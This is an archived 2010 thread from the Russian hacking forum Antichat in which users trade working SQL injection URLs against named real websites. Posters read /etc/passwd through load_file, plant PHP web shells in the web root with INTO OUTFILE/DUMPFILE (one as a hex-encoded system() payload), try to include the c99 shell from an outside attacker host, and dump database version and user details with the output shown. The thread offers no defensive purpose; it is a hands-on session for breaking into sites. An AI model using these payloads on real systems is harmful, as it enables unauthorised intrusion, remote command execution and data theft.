ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.03.2010, 01:40
|
|
Banned
Регистрация: 04.06.2009
Сообщений: 58
Провел на форуме:
327313
Репутация:
23
|
|
Дальше сам 
PHP код:
http://www.enlighteneddating.com/softbizDatingScript/products.php?cid=49+and+1=0+union+select+1,version(),3,4,5--
|
|
|
18.03.2010, 01:43
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
PHP код:
http://www.enlighteneddating.com/softbizDatingScript/search_results.php?browse=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws(0x3a,version(),database(),user()),30,31,32,33,34,35,36,37,38,39/*
... |
|
|
|
18.03.2010, 08:53
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
вот есть саyт..
версия 4.1.18..есть mysql.user и file_priv Y..
хочу заливать шелл..
читаю /etc/passwd
http://www.georgica.net/analitic/?page=ru&id=-303'+union+select+1,2,load_file('/etc/passwd'),4,5,6,7,8+from+mysql.user+--+
а потом '/'
http://www.georgica.net/analitic/?page=ru&id=-303%27+union+select+1,2,load_file(%27/%27),4,5,6,7,8+from+mysql.user+--+
а здесь видно папка
http://www.georgica.net/analitic/?page=ru&id=-303%27+union+select+1,2,load_file(%27/home/www/htdocs/%27),4,5,6,7,8+from+mysql.user+--+
и потом здеlaю так..
http://www.georgica.net/analitic/?page=ru&id=-303%27+union+select+%3C?include($_GET[%22cmd%22]);?%3E,1,2,3,4,5,6,7+from+mysql.user/**/into/**/outfile/**/%27/home/www/htdocs/rfi.php%27/*
http://www.georgica.net/rfi.php?cmd=http://azattacker.org/forum/c99.txt?
и не получается
обшем поjaлуста помоqите заливат шелл
|
|
|
|
18.03.2010, 10:10
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095
Репутация:
34
|
|
Сообщение от LokbatanLi
вот есть саyт..
версия 4.1.18..есть mysql.user и file_priv Y..
хочу заливать шелл..
читаю /etc/passwd
http://www.georgica.net/analitic/?page=ru&id=-303'+union+select+1,2,load_file('/etc/passwd'),4,5,6,7,8+from+mysql.user+--+
а потом '/'
http://www.georgica.net/analitic/?page=ru&id=-303%27+union+select+1,2,load_file(%27/%27),4,5,6,7,8+from+mysql.user+--+
а здесь видно папка
http://www.georgica.net/analitic/?page=ru&id=-303%27+union+select+1,2,load_file(%27/home/www/htdocs/%27),4,5,6,7,8+from+mysql.user+--+
и потом здеlaю так..
http://www.georgica.net/analitic/?page=ru&id=-303%27+union+select+%3C?include($_GET[%22cmd%22]);?%3E,1,2,3,4,5,6,7+from+mysql.user/**/into/**/outfile/**/%27/home/www/htdocs/rfi.php%27/*
http://www.georgica.net/rfi.php?cmd=http://azattacker.org/forum/c99.txt?
и не получается
обшем поjaлуста помоqите заливат шелл
чё то я не могу понять а вывод, то есть команды?
вот чё то я пеопробовал и файло у меня не перечиталось
|
|
|
|
18.03.2010, 10:20
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
LokbatanLi!как то ты по извращенному льешь шелл
Вот! http://www.georgica.net/temp/1.php?id=ls
вывод в файл работает!
http://www.georgica.net/analitic/?page=ru&id=-303'+UNION+SELECT+0x3C3F206563686F20223C7072653E22 3B6563686F2073797374656D28245F4745545B226964225D29 3B6563686F20223C2F7072653E22203F3E,2,3,4,5,6,7,8+F ROM+mysql.user+INTO+DUMPFILE+'/home/www/htdocs/temp/1.php'+--+
все норм
Последний раз редактировалось Rubaka; 18.03.2010 в 10:35..
Причина: поправка!
|
|
|
|
18.03.2010, 10:39
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
Rubaka
a qde shell ??
http://www.georgica.net/temp/1.php?id=http://azattacker.org/forum/c99.txt?
|
|
|
|
18.03.2010, 10:49
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
Вот шелл http://www.georgica.net/temp/1.php?id=ls <------в id комманды передаешь!!
а не инклюдишь!
тама код system($_GET["id"]); прописан!
и ты могешь мля не писать транслитом!!!!!!!!!!!
Последний раз редактировалось Rubaka; 18.03.2010 в 11:18..
Причина: +
|
|
|
|
18.03.2010, 10:54
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
net ne kak ne moqu ponyat izvini..
|
|
|
|
18.03.2010, 15:26
|
|
Banned
Регистрация: 05.02.2010
Сообщений: 70
Провел на форуме:
177258
Репутация:
5
|
|
Подскажите плиз. http://met-con.com/images/?w=700&src=/images/properties/dump%20oct%2019%202009%20110.jpg
там есть читалка?
|
|
|
|
18.03.2010, 17:08
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
скуля есть
PHP код:
http://met-con.com/mdc/index.php?page=-1+union+select+1,concat(version(),0x40,database(),0x40,user()),3,4,5--+
5.0.89-community@metcon_web@metcon_webuser@localhost |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
